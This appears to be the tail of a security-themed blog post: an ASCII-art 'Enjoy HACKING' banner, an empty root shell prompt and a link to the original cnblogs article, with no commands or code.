    +-+-+-+-+-+ +-+-+-+-+-+-+-+
     |E|n|j|o|y| |H|A|C|K|I|N|G|
     +-+-+-+-+-+ +-+-+-+-+-+-+-+	
    root@ubuntu:~#
    
  • Original article: https://www.cnblogs.com/Kali-Team/p/12212396.html